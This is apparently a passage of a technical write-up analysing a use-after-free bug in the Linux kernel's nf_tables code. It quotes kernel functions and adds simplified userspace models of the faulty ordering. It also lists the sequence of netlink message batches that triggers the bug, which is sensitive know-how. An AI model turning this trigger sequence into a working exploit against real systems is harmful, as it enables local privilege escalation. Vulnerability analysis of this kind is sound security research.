<p><code class="language-plaintext highlighter-rouge">nf_tables_commit</code> and <code class="language-plaintext highlighter-rouge">nf_tables_abort</code> both iterate through the <code class="language-plaintext highlighter-rouge">nft_net-&gt;commit_list</code> and handle each item in the list. <code class="language-plaintext highlighter-rouge">nf_tables_abort</code> is more relevant for our context, so we’ll focus on that. Items in the <code class="language-plaintext highlighter-rouge">nft_net-&gt;commit_list</code> are transaction objects: each one records the type of update to apply to an <code class="language-plaintext highlighter-rouge">nf_tables</code> object, together with a data structure containing the target object. When <code class="language-plaintext highlighter-rouge">nf_tables</code> objects are created or destroyed, they are wrapped in a <code class="language-plaintext highlighter-rouge">struct nft_trans</code> object and added to the <code class="language-plaintext highlighter-rouge">nft_net-&gt;commit_list</code>, to be processed together with the other <code class="language-plaintext highlighter-rouge">nft_trans</code> instances once the whole batch has been handled. Each <code class="language-plaintext highlighter-rouge">nft_trans</code> is removed from the list after it is processed.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">__nf_tables_abort</span><span class="p">(</span><span class="k">struct</span> <span class="n">net</span> <span class="o">*</span><span class="n">net</span><span class="p">,</span> <span class="k">enum</span> <span class="n">nfnl_abort_action</span> <span class="n">action</span><span class="p">)</span>
<span class="p">{</span>
        <span class="p">...</span>
        <span class="n">list_for_each_entry_safe_reverse</span><span class="p">(</span><span class="n">trans</span><span class="p">,</span> <span class="n">next</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">nft_net</span><span class="o">-&gt;</span><span class="n">commit_list</span><span class="p">,</span>
                                         <span class="n">list</span><span class="p">)</span> <span class="p">{</span>
                <span class="k">switch</span> <span class="p">(</span><span class="n">trans</span><span class="o">-&gt;</span><span class="n">msg_type</span><span class="p">)</span> <span class="p">{</span>
                <span class="k">case</span> <span class="n">NFT_MSG_NEWSETELEM</span><span class="p">:</span>
                        <span class="k">if</span> <span class="p">(</span><span class="n">nft_trans_elem_set_bound</span><span class="p">(</span><span class="n">trans</span><span class="p">))</span> <span class="p">{</span>
                                <span class="n">nft_trans_destroy</span><span class="p">(</span><span class="n">trans</span><span class="p">);</span>
                                <span class="k">break</span><span class="p">;</span>
                        <span class="p">}</span>
                        <span class="n">te</span> <span class="o">=</span> <span class="p">(</span><span class="k">struct</span> <span class="n">nft_trans_elem</span> <span class="o">*</span><span class="p">)</span><span class="n">trans</span><span class="o">-&gt;</span><span class="n">data</span><span class="p">;</span>
                        <span class="n">nft_setelem_remove</span><span class="p">(</span><span class="n">net</span><span class="p">,</span> <span class="n">te</span><span class="o">-&gt;</span><span class="n">set</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">te</span><span class="o">-&gt;</span><span class="n">elem</span><span class="p">);</span>
                        <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">nft_setelem_is_catchall</span><span class="p">(</span><span class="n">te</span><span class="o">-&gt;</span><span class="n">set</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">te</span><span class="o">-&gt;</span><span class="n">elem</span><span class="p">))</span>
                                <span class="n">atomic_dec</span><span class="p">(</span><span class="o">&amp;</span><span class="n">te</span><span class="o">-&gt;</span><span class="n">set</span><span class="o">-&gt;</span><span class="n">nelems</span><span class="p">);</span>
                        <span class="k">break</span><span class="p">;</span>
                <span class="p">...</span>
                <span class="k">case</span> <span class="n">NFT_MSG_NEWOBJ</span><span class="p">:</span>
                        <span class="k">if</span> <span class="p">(</span><span class="n">nft_trans_obj_update</span><span class="p">(</span><span class="n">trans</span><span class="p">))</span> <span class="p">{</span>
                                <span class="n">nft_obj_destroy</span><span class="p">(</span><span class="o">&amp;</span><span class="n">trans</span><span class="o">-&gt;</span><span class="n">ctx</span><span class="p">,</span>
                                                <span class="n">nft_trans_obj_newobj</span><span class="p">(</span><span class="n">trans</span><span class="p">));</span>
                                <span class="n">nft_trans_destroy</span><span class="p">(</span><span class="n">trans</span><span class="p">);</span>
                        <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
                                <span class="n">trans</span><span class="o">-&gt;</span><span class="n">ctx</span><span class="p">.</span><span class="n">table</span><span class="o">-&gt;</span><span class="n">use</span><span class="o">--</span><span class="p">;</span>
                                <span class="n">nft_obj_del</span><span class="p">(</span><span class="n">nft_trans_obj</span><span class="p">(</span><span class="n">trans</span><span class="p">));</span>
                        <span class="p">}</span>
                        <span class="k">break</span><span class="p">;</span>
                <span class="p">...</span>
                <span class="p">}</span>
        <span class="p">}</span>
        <span class="n">list_for_each_entry_safe_reverse</span><span class="p">(</span><span class="n">trans</span><span class="p">,</span> <span class="n">next</span><span class="p">,</span>
                                         <span class="o">&amp;</span><span class="n">nft_net</span><span class="o">-&gt;</span><span class="n">commit_list</span><span class="p">,</span> <span class="n">list</span><span class="p">)</span> <span class="p">{</span>
                <span class="n">list_del</span><span class="p">(</span><span class="o">&amp;</span><span class="n">trans</span><span class="o">-&gt;</span><span class="n">list</span><span class="p">);</span>
                <span class="n">nf_tables_abort_release</span><span class="p">(</span><span class="n">trans</span><span class="p">);</span>
        <span class="p">}</span>
        <span class="p">...</span>
        <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
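
<p>The two-pass shape of the abort path (undo every queued transaction newest-first, then unlink and release them) can be illustrated with a small doubly linked list. This is a simplified sketch under my own assumptions: <code class="language-plaintext highlighter-rouge">struct trans</code>, <code class="language-plaintext highlighter-rouge">struct commit_list</code>, <code class="language-plaintext highlighter-rouge">trans_add_tail</code> and <code class="language-plaintext highlighter-rouge">abort_batch</code> are hypothetical names, and a single <code class="language-plaintext highlighter-rouge">use</code> counter stands in for whatever state a real transaction would roll back.</p>

```c
#include <assert.h>
#include <stddef.h>
#include <stdlib.h>

struct trans {
    int id;                     /* identifies the queued update */
    int *use;                   /* counter bumped when the update was queued */
    struct trans *prev, *next;
};

struct commit_list {
    struct trans *head, *tail;
};

/* Queue a transaction at the tail. The counter bump is folded into this
 * helper for brevity. Returns 0 on success, -1 on allocation failure. */
int trans_add_tail(struct commit_list *cl, int id, int *use)
{
    struct trans *t = malloc(sizeof(*t));

    if (!t)
        return -1;
    t->id = id;
    t->use = use;
    t->next = NULL;
    t->prev = cl->tail;
    if (cl->tail)
        cl->tail->next = t;
    else
        cl->head = t;
    cl->tail = t;
    (*use)++;
    return 0;
}

/* Roll back every queued transaction. The ids are written to undo_order
 * (up to cap entries) in the order they were undone. Returns the number
 * of transactions rolled back. */
size_t abort_batch(struct commit_list *cl, int *undo_order, size_t cap)
{
    struct trans *t, *prev;
    size_t n = 0;

    /* Pass 1: undo newest first, so later updates are reverted before
     * the earlier ones they may depend on. */
    for (t = cl->tail; t; t = t->prev) {
        (*t->use)--;
        if (n < cap)
            undo_order[n] = t->id;
        n++;
    }

    /* Pass 2: unlink and release; prev is saved before t is freed. */
    for (t = cl->tail; t; t = prev) {
        prev = t->prev;
        free(t);
    }
    cl->head = cl->tail = NULL;
    return n;
}
```

<p>Queuing transactions 1, 2 and 3 and then calling <code class="language-plaintext highlighter-rouge">abort_batch</code> undoes them in the order 3, 2, 1 and leaves both the counter and the list empty.</p>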

<p>For instance, the creation of an <code class="language-plaintext highlighter-rouge">nft_object</code> is handled by the function <code class="language-plaintext highlighter-rouge">nf_tables_newobj</code>. After the object is initialized, it is stored in an <code class="language-plaintext highlighter-rouge">nft_trans</code> [1], and this <code class="language-plaintext highlighter-rouge">nft_trans</code> is appended to the <code class="language-plaintext highlighter-rouge">nft_net-&gt;commit_list</code> [2]. The object is also inserted into an <code class="language-plaintext highlighter-rouge">rhltable</code> for future lookups. When the vulnerability is triggered, <code class="language-plaintext highlighter-rouge">__nf_tables_abort</code> is called and walks the <code class="language-plaintext highlighter-rouge">nft_net-&gt;commit_list</code>.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">nf_tables_newobj</span><span class="p">(</span><span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span><span class="p">,</span> <span class="k">const</span> <span class="k">struct</span> <span class="n">nfnl_info</span> <span class="o">*</span><span class="n">info</span><span class="p">,</span>
                            <span class="k">const</span> <span class="k">struct</span> <span class="n">nlattr</span> <span class="o">*</span> <span class="k">const</span> <span class="n">nla</span><span class="p">[])</span>
<span class="p">{</span>
        <span class="n">table</span> <span class="o">=</span> <span class="n">nft_table_lookup</span><span class="p">(</span><span class="n">net</span><span class="p">,</span> <span class="n">nla</span><span class="p">[</span><span class="n">NFTA_OBJ_TABLE</span><span class="p">],</span> <span class="n">family</span><span class="p">,</span> <span class="n">genmask</span><span class="p">,</span>
                                 <span class="n">NETLINK_CB</span><span class="p">(</span><span class="n">skb</span><span class="p">).</span><span class="n">portid</span><span class="p">);</span>
        <span class="p">...</span>
        <span class="n">obj</span> <span class="o">=</span> <span class="n">nft_obj_init</span><span class="p">(</span><span class="o">&amp;</span><span class="n">ctx</span><span class="p">,</span> <span class="n">type</span><span class="p">,</span> <span class="n">nla</span><span class="p">[</span><span class="n">NFTA_OBJ_DATA</span><span class="p">]);</span>
        <span class="p">...</span>
        <span class="n">obj</span><span class="o">-&gt;</span><span class="n">key</span><span class="p">.</span><span class="n">table</span> <span class="o">=</span> <span class="n">table</span><span class="p">;</span>
        <span class="n">obj</span><span class="o">-&gt;</span><span class="n">handle</span> <span class="o">=</span> <span class="n">nf_tables_alloc_handle</span><span class="p">(</span><span class="n">table</span><span class="p">);</span>

        <span class="n">obj</span><span class="o">-&gt;</span><span class="n">key</span><span class="p">.</span><span class="n">name</span> <span class="o">=</span> <span class="n">nla_strdup</span><span class="p">(</span><span class="n">nla</span><span class="p">[</span><span class="n">NFTA_OBJ_NAME</span><span class="p">],</span> <span class="n">GFP_KERNEL</span><span class="p">);</span>
        <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">obj</span><span class="o">-&gt;</span><span class="n">key</span><span class="p">.</span><span class="n">name</span><span class="p">)</span> <span class="p">{</span>
                <span class="n">err</span> <span class="o">=</span> <span class="o">-</span><span class="n">ENOMEM</span><span class="p">;</span>
                <span class="k">goto</span> <span class="n">err_strdup</span><span class="p">;</span>
        <span class="p">}</span>
        <span class="p">...</span>
        <span class="n">err</span> <span class="o">=</span> <span class="n">nft_trans_obj_add</span><span class="p">(</span><span class="o">&amp;</span><span class="n">ctx</span><span class="p">,</span> <span class="n">NFT_MSG_NEWOBJ</span><span class="p">,</span> <span class="n">obj</span><span class="p">);</span>    <span class="o">&lt;---</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">err</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span>
                <span class="k">goto</span> <span class="n">err_trans</span><span class="p">;</span>
        <span class="n">err</span> <span class="o">=</span> <span class="n">rhltable_insert</span><span class="p">(</span><span class="o">&amp;</span><span class="n">nft_objname_ht</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">obj</span><span class="o">-&gt;</span><span class="n">rhlhead</span><span class="p">,</span>
                              <span class="n">nft_objname_ht_params</span><span class="p">);</span>
        <span class="p">...</span>
        <span class="n">list_add_tail_rcu</span><span class="p">(</span><span class="o">&amp;</span><span class="n">obj</span><span class="o">-&gt;</span><span class="n">list</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">table</span><span class="o">-&gt;</span><span class="n">objects</span><span class="p">);</span>
        <span class="n">table</span><span class="o">-&gt;</span><span class="n">use</span><span class="o">++</span><span class="p">;</span>
        <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>

<span class="k">static</span> <span class="kt">int</span> <span class="nf">nft_trans_obj_add</span><span class="p">(</span><span class="k">struct</span> <span class="n">nft_ctx</span> <span class="o">*</span><span class="n">ctx</span><span class="p">,</span> <span class="kt">int</span> <span class="n">msg_type</span><span class="p">,</span>
                             <span class="k">struct</span> <span class="n">nft_object</span> <span class="o">*</span><span class="n">obj</span><span class="p">)</span>
<span class="p">{</span>
        <span class="k">struct</span> <span class="n">nft_trans</span> <span class="o">*</span><span class="n">trans</span><span class="p">;</span>

        <span class="n">trans</span> <span class="o">=</span> <span class="n">nft_trans_alloc</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">msg_type</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="k">struct</span> <span class="n">nft_trans_obj</span><span class="p">));</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">trans</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span>
                <span class="k">return</span> <span class="o">-</span><span class="n">ENOMEM</span><span class="p">;</span>

        <span class="k">if</span> <span class="p">(</span><span class="n">msg_type</span> <span class="o">==</span> <span class="n">NFT_MSG_NEWOBJ</span><span class="p">)</span>
                <span class="n">nft_activate_next</span><span class="p">(</span><span class="n">ctx</span><span class="o">-&gt;</span><span class="n">net</span><span class="p">,</span> <span class="n">obj</span><span class="p">);</span>

        <span class="n">nft_trans_obj</span><span class="p">(</span><span class="n">trans</span><span class="p">)</span> <span class="o">=</span> <span class="n">obj</span><span class="p">;</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
        <span class="n">nft_trans_commit_list_add_tail</span><span class="p">(</span><span class="n">ctx</span><span class="o">-&gt;</span><span class="n">net</span><span class="p">,</span> <span class="n">trans</span><span class="p">);</span>

        <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>

<span class="k">static</span> <span class="kt">void</span> <span class="nf">nft_trans_commit_list_add_tail</span><span class="p">(</span><span class="k">struct</span> <span class="n">net</span> <span class="o">*</span><span class="n">net</span><span class="p">,</span> <span class="k">struct</span> <span class="n">nft_trans</span> <span class="o">*</span><span class="n">trans</span><span class="p">)</span>
<span class="p">{</span>
        <span class="k">struct</span> <span class="n">nftables_pernet</span> <span class="o">*</span><span class="n">nft_net</span> <span class="o">=</span> <span class="n">nft_pernet</span><span class="p">(</span><span class="n">net</span><span class="p">);</span>

        <span class="n">list_add_tail</span><span class="p">(</span><span class="o">&amp;</span><span class="n">trans</span><span class="o">-&gt;</span><span class="n">list</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">nft_net</span><span class="o">-&gt;</span><span class="n">commit_list</span><span class="p">);</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">2</span><span class="p">]</span>
<span class="p">}</span>
</code></pre></div></div>

<h1 id="the-vulnerability">The vulnerability</h1>
<p>The bug stems from the order of [1] and [2] in <code class="language-plaintext highlighter-rouge">nft_set_elem_expr_alloc</code>. <code class="language-plaintext highlighter-rouge">nft_expr_init</code> is called for every type of <code class="language-plaintext highlighter-rouge">nf_tables</code> expression, and the check <code class="language-plaintext highlighter-rouge">if (!(expr-&gt;ops-&gt;type-&gt;flags &amp; NFT_EXPR_STATEFUL))</code> is only performed afterwards. When the check at [2] fails, the function jumps to the error handling code, which destroys the already initialized expression and returns an error.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">nft_expr</span> <span class="o">*</span><span class="nf">nft_set_elem_expr_alloc</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">nft_ctx</span> <span class="o">*</span><span class="n">ctx</span><span class="p">,</span>
					 <span class="k">const</span> <span class="k">struct</span> <span class="n">nft_set</span> <span class="o">*</span><span class="n">set</span><span class="p">,</span>
					 <span class="k">const</span> <span class="k">struct</span> <span class="n">nlattr</span> <span class="o">*</span><span class="n">attr</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">struct</span> <span class="n">nft_expr</span> <span class="o">*</span><span class="n">expr</span><span class="p">;</span>
	<span class="kt">int</span> <span class="n">err</span><span class="p">;</span>

	<span class="n">expr</span> <span class="o">=</span> <span class="n">nft_expr_init</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">attr</span><span class="p">);</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">IS_ERR</span><span class="p">(</span><span class="n">expr</span><span class="p">))</span>
		<span class="k">return</span> <span class="n">expr</span><span class="p">;</span>

	<span class="n">err</span> <span class="o">=</span> <span class="o">-</span><span class="n">EOPNOTSUPP</span><span class="p">;</span>
	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="p">(</span><span class="n">expr</span><span class="o">-&gt;</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">type</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">NFT_EXPR_STATEFUL</span><span class="p">))</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">2</span><span class="p">]</span>
		<span class="k">goto</span> <span class="n">err_set_elem_expr</span><span class="p">;</span>

	<span class="k">if</span> <span class="p">(</span><span class="n">expr</span><span class="o">-&gt;</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">type</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">NFT_EXPR_GC</span><span class="p">)</span> <span class="p">{</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">set</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">NFT_SET_TIMEOUT</span><span class="p">)</span>
			<span class="k">goto</span> <span class="n">err_set_elem_expr</span><span class="p">;</span>
		<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">set</span><span class="o">-&gt;</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">gc_init</span><span class="p">)</span>
			<span class="k">goto</span> <span class="n">err_set_elem_expr</span><span class="p">;</span>
		<span class="n">set</span><span class="o">-&gt;</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">gc_init</span><span class="p">(</span><span class="n">set</span><span class="p">);</span>
	<span class="p">}</span>

	<span class="k">return</span> <span class="n">expr</span><span class="p">;</span>

<span class="nl">err_set_elem_expr:</span>
	<span class="n">nft_expr_destroy</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">expr</span><span class="p">);</span>
	<span class="k">return</span> <span class="n">ERR_PTR</span><span class="p">(</span><span class="n">err</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
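<p>The ordering problem can be reproduced in a small userspace model. The sketch below is not kernel code: <code class="language-plaintext highlighter-rouge">expr_type</code>, <code class="language-plaintext highlighter-rouge">expr_init</code>, <code class="language-plaintext highlighter-rouge">init_calls</code> and both <code class="language-plaintext highlighter-rouge">alloc_*</code> helpers are hypothetical names, and the counter simply stands in for whatever state a real init function touches. It contrasts the "initialize, then check" order from the listing above with a "check, then initialize" order.</p>

```c
#include <assert.h>
#include <stddef.h>
#include <stdlib.h>

#define EXPR_STATEFUL 0x1u  /* illustrative stand-in for NFT_EXPR_STATEFUL */

/* Hypothetical, simplified stand-ins for nft_expr_type / nft_expr. */
struct expr_type {
    const char *name;
    unsigned int flags;
};

struct expr {
    const struct expr_type *type;
};

/* Counts how often init ran, i.e. how often its side effects happened. */
static int init_calls;

static struct expr *expr_init(const struct expr_type *type)
{
    struct expr *e = calloc(1, sizeof(*e));

    if (e == NULL)
        return NULL;
    e->type = type;
    init_calls++;  /* models the state a real init function would touch */
    return e;
}

/* Order from the listing above: initialize first, check the flag after. */
static struct expr *alloc_init_then_check(const struct expr_type *type)
{
    struct expr *e;

    assert(type != NULL);
    e = expr_init(type);
    if (e == NULL)
        return NULL;
    if (!(e->type->flags & EXPR_STATEFUL)) {
        free(e);  /* the expression is gone, but init has already run */
        return NULL;
    }
    return e;
}

/* Alternative order: reject unsupported types before any init runs. */
static struct expr *alloc_check_then_init(const struct expr_type *type)
{
    assert(type != NULL);
    if (!(type->flags & EXPR_STATEFUL))
        return NULL;
    return expr_init(type);
}
```

<p>In this model, both helpers reject a type without the stateful flag, but only <code class="language-plaintext highlighter-rouge">alloc_init_then_check</code> increments <code class="language-plaintext highlighter-rouge">init_calls</code> before doing so. Whatever the init function did is left for the destroy path to undo correctly.</p>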
<h1 id="triggering-the-vulnerability">Triggering the vulnerability</h1>
<p>To see how this leads to a UAF, we can examine what happens when certain <code class="language-plaintext highlighter-rouge">nf_tables</code> entities are created in a particular order. For example, we can create an <code class="language-plaintext highlighter-rouge">nft_table</code>, <code class="language-plaintext highlighter-rouge">nft_set</code>, <code class="language-plaintext highlighter-rouge">nft_object</code> or <code class="language-plaintext highlighter-rouge">nft_set_elem</code>. An <code class="language-plaintext highlighter-rouge">nft_set</code> or <code class="language-plaintext highlighter-rouge">nft_object</code> must belong to an <code class="language-plaintext highlighter-rouge">nft_table</code>, and an <code class="language-plaintext highlighter-rouge">nft_set_elem</code> is created as an element of an <code class="language-plaintext highlighter-rouge">nft_set</code>. We can also specify expressions and/or a reference to an <code class="language-plaintext highlighter-rouge">nft_object</code> when creating an <code class="language-plaintext highlighter-rouge">nft_set_elem</code>. To trigger the UAF, we need to send two separate batches of netlink messages. The first batch creates an <code class="language-plaintext highlighter-rouge">nft_table</code> and an <code class="language-plaintext highlighter-rouge">nft_set</code>. The second batch creates an <code class="language-plaintext highlighter-rouge">nft_object</code>, followed by an <code class="language-plaintext highlighter-rouge">nft_set_elem</code> that references the created <code class="language-plaintext highlighter-rouge">nft_object</code>, and finally an <code class="language-plaintext highlighter-rouge">nft_set_elem</code> with an <code class="language-plaintext highlighter-rouge">nft_objref_map</code> expression. The messages must be sent in exactly that order.</p>

<p>When creating an <code class="language-plaintext highlighter-rouge">nft_object</code>, recall that the object is added to an <code class="language-plaintext highlighter-rouge">nft_trans</code>, and this <code class="language-plaintext highlighter-rouge">nft_trans</code> is added to <code class="language-plaintext highlighter-rouge">nft_net-&gt;commit_list</code>. The object is also added to an <code class="language-plaintext highlighter-rouge">rhltable</code> for future lookups. This means that <code class="language-plaintext highlighter-rouge">nft_net-&gt;commit_list</code> contains one <code class="language-plaintext highlighter-rouge">nft_trans</code> entry once the <code class="language-plaintext highlighter-rouge">nft_object</code> has been created.</p>

<p>The next message in the batch creates an <code class="language-plaintext highlighter-rouge">nft_set_elem</code>. It is handled by <code class="language-plaintext highlighter-rouge">nf_tables_newsetelem</code>, which calls <code class="language-plaintext highlighter-rouge">nft_add_set_elem</code> to parse the message data and create the element.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">nf_tables_newsetelem</span><span class="p">(</span><span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span><span class="p">,</span>
                                <span class="k">const</span> <span class="k">struct</span> <span class="n">nfnl_info</span> <span class="o">*</span><span class="n">info</span><span class="p">,</span>
                                <span class="k">const</span> <span class="k">struct</span> <span class="n">nlattr</span> <span class="o">*</span> <span class="k">const</span> <span class="n">nla</span><span class="p">[])</span>
<span class="p">{</span>
        <span class="n">table</span> <span class="o">=</span> <span class="n">nft_table_lookup</span><span class="p">(</span><span class="n">net</span><span class="p">,</span> <span class="n">nla</span><span class="p">[</span><span class="n">NFTA_SET_ELEM_LIST_TABLE</span><span class="p">],</span> <span class="n">family</span><span class="p">,</span>
                                 <span class="n">genmask</span><span class="p">,</span> <span class="n">NETLINK_CB</span><span class="p">(</span><span class="n">skb</span><span class="p">).</span><span class="n">portid</span><span class="p">);</span>
        <span class="p">...</span>
        <span class="n">set</span> <span class="o">=</span> <span class="n">nft_set_lookup_global</span><span class="p">(</span><span class="n">net</span><span class="p">,</span> <span class="n">table</span><span class="p">,</span> <span class="n">nla</span><span class="p">[</span><span class="n">NFTA_SET_ELEM_LIST_SET</span><span class="p">],</span>
                                    <span class="n">nla</span><span class="p">[</span><span class="n">NFTA_SET_ELEM_LIST_SET_ID</span><span class="p">],</span> <span class="n">genmask</span><span class="p">);</span>
        <span class="p">...</span>
        <span class="n">nla_for_each_nested</span><span class="p">(</span><span class="n">attr</span><span class="p">,</span> <span class="n">nla</span><span class="p">[</span><span class="n">NFTA_SET_ELEM_LIST_ELEMENTS</span><span class="p">],</span> <span class="n">rem</span><span class="p">)</span> <span class="p">{</span>
                <span class="n">err</span> <span class="o">=</span> <span class="n">nft_add_set_elem</span><span class="p">(</span><span class="o">&amp;</span><span class="n">ctx</span><span class="p">,</span> <span class="n">set</span><span class="p">,</span> <span class="n">attr</span><span class="p">,</span> <span class="n">info</span><span class="o">-&gt;</span><span class="n">nlh</span><span class="o">-&gt;</span><span class="n">nlmsg_flags</span><span class="p">);</span>
                <span class="k">if</span> <span class="p">(</span><span class="n">err</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span>
                        <span class="k">return</span> <span class="n">err</span><span class="p">;</span>
        <span class="p">}</span>
        <span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">nft_add_set_elem</code> first parses the netlink message data to prepare an <code class="language-plaintext highlighter-rouge">nft_set_ext_tmpl</code>, a template that is used to initialize the set elem. One step in preparing the template is to check whether the message names an object that the set elem should reference (specified by the netlink attribute <code class="language-plaintext highlighter-rouge">NFTA_SET_ELEM_OBJREF</code>). If the attribute is present, the object is looked up with <code class="language-plaintext highlighter-rouge">nft_obj_lookup</code> [1], which searches the <code class="language-plaintext highlighter-rouge">rhltable</code> containing all objects for that table. The reference to the <code class="language-plaintext highlighter-rouge">nft_object</code> is then added to the <code class="language-plaintext highlighter-rouge">nft_set_elem</code>’s <code class="language-plaintext highlighter-rouge">nft_set_ext</code> [2]. Finally, the <code class="language-plaintext highlighter-rouge">nft_set_elem</code> is added to an <code class="language-plaintext highlighter-rouge">nft_trans</code>, which is in turn added to <code class="language-plaintext highlighter-rouge">nft_net-&gt;commit_list</code> [3]. At this point, <code class="language-plaintext highlighter-rouge">nft_net-&gt;commit_list</code> contains two <code class="language-plaintext highlighter-rouge">nft_trans</code> entries: one for the <code class="language-plaintext highlighter-rouge">nft_object</code> created earlier and one for the new <code class="language-plaintext highlighter-rouge">nft_set_elem</code>.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">nft_add_set_elem</span><span class="p">(</span><span class="k">struct</span> <span class="n">nft_ctx</span> <span class="o">*</span><span class="n">ctx</span><span class="p">,</span> <span class="k">struct</span> <span class="n">nft_set</span> <span class="o">*</span><span class="n">set</span><span class="p">,</span>
                            <span class="k">const</span> <span class="k">struct</span> <span class="n">nlattr</span> <span class="o">*</span><span class="n">attr</span><span class="p">,</span> <span class="n">u32</span> <span class="n">nlmsg_flags</span><span class="p">)</span>
<span class="p">{</span>
         <span class="p">...</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">nla</span><span class="p">[</span><span class="n">NFTA_SET_ELEM_EXPR</span><span class="p">])</span> <span class="p">{</span>
                <span class="k">struct</span> <span class="n">nft_expr</span> <span class="o">*</span><span class="n">expr</span><span class="p">;</span>

                <span class="k">if</span> <span class="p">(</span><span class="n">set</span><span class="o">-&gt;</span><span class="n">num_exprs</span> <span class="o">&amp;&amp;</span> <span class="n">set</span><span class="o">-&gt;</span><span class="n">num_exprs</span> <span class="o">!=</span> <span class="mi">1</span><span class="p">)</span>
                        <span class="k">return</span> <span class="o">-</span><span class="n">EOPNOTSUPP</span><span class="p">;</span>

                <span class="n">expr</span> <span class="o">=</span> <span class="n">nft_set_elem_expr_alloc</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">set</span><span class="p">,</span>
                                               <span class="n">nla</span><span class="p">[</span><span class="n">NFTA_SET_ELEM_EXPR</span><span class="p">]);</span>
                <span class="p">...</span>
        <span class="p">}</span>
        <span class="p">...</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">nla</span><span class="p">[</span><span class="n">NFTA_SET_ELEM_OBJREF</span><span class="p">]</span> <span class="o">!=</span> <span class="nb">NULL</span><span class="p">)</span> <span class="p">{</span>
                <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="p">(</span><span class="n">set</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">NFT_SET_OBJECT</span><span class="p">))</span> <span class="p">{</span>
                        <span class="n">err</span> <span class="o">=</span> <span class="o">-</span><span class="n">EINVAL</span><span class="p">;</span>
                        <span class="k">goto</span> <span class="n">err_parse_key_end</span><span class="p">;</span>
                <span class="p">}</span>
                <span class="n">obj</span> <span class="o">=</span> <span class="n">nft_obj_lookup</span><span class="p">(</span><span class="n">ctx</span><span class="o">-&gt;</span><span class="n">net</span><span class="p">,</span> <span class="n">ctx</span><span class="o">-&gt;</span><span class="n">table</span><span class="p">,</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
                                     <span class="n">nla</span><span class="p">[</span><span class="n">NFTA_SET_ELEM_OBJREF</span><span class="p">],</span>
                                     <span class="n">set</span><span class="o">-&gt;</span><span class="n">objtype</span><span class="p">,</span> <span class="n">genmask</span><span class="p">);</span>
                <span class="p">...</span>
                <span class="n">nft_set_ext_add</span><span class="p">(</span><span class="o">&amp;</span><span class="n">tmpl</span><span class="p">,</span> <span class="n">NFT_SET_EXT_OBJREF</span><span class="p">);</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">2</span><span class="p">]</span>
        <span class="p">}</span>
        <span class="p">...</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">obj</span><span class="p">)</span> <span class="p">{</span>
                <span class="o">*</span><span class="n">nft_set_ext_obj</span><span class="p">(</span><span class="n">ext</span><span class="p">)</span> <span class="o">=</span> <span class="n">obj</span><span class="p">;</span>
                <span class="n">obj</span><span class="o">-&gt;</span><span class="n">use</span><span class="o">++</span><span class="p">;</span>
        <span class="p">}</span>
         <span class="p">...</span>
